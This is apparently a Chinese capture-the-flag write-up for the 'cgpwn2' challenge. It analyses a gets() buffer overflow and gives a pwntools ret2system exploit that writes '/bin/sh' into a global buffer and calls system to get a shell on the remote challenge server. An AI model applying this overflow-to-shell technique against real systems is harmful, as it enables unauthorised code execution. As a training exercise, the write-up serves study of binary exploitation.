cgpwn2---writeup

文件下载地址：

链接：https://pan.baidu.com/s/1MjaJM7ThNQewgIkpFKl3cg
提取码：v4l7 

0x01.分析

checksec：

32位程序，仅开启NX。

查看源码：

大概理清一下流程，首先会输出字符串，然后要求输入一个字符串，放到name里面，然后返回的时候，再此要求出入字符串，然后再输出一句话后程序结束。

发现高危函数：gets。继续寻找，是否存在system调用。

果然存在，找到地址：

system的地址为：0x08048420

不过仔细查看一下system的具体调用，发现：

没有/bin/sh，所以我们要替换这个字符串，回到hello（）函数，继续观察一些变量：

发现将我们的输入写入name变量，前面没有，所以一定是个全局变量，查看详情：

发现是位于bss段，于是顿时有了思路：

第一次输入先把/bin/sh写入name里面，第二次输入再利用溢出，跳转到system处，将name作为参数，得到shell。

确定一下溢出量：（第二次输入才开始确定偏移量）

 

0x02.exp

##!/usr/bin/env python
from pwn import*

#r=process('./cgpwn2')
r=remote("111.198.29.45",32269)

system_adr=0x08048420
name_adr=0x0804A080

payload=42*'A'+p32(system_adr)+p32(0x0)+p32(name_adr)

r.recvuntil("please tell me your name")
r.sendline("/bin/sh")
r.recvuntil("hello,you can leave some message here:")
r.sendline(payload)
r.interactive()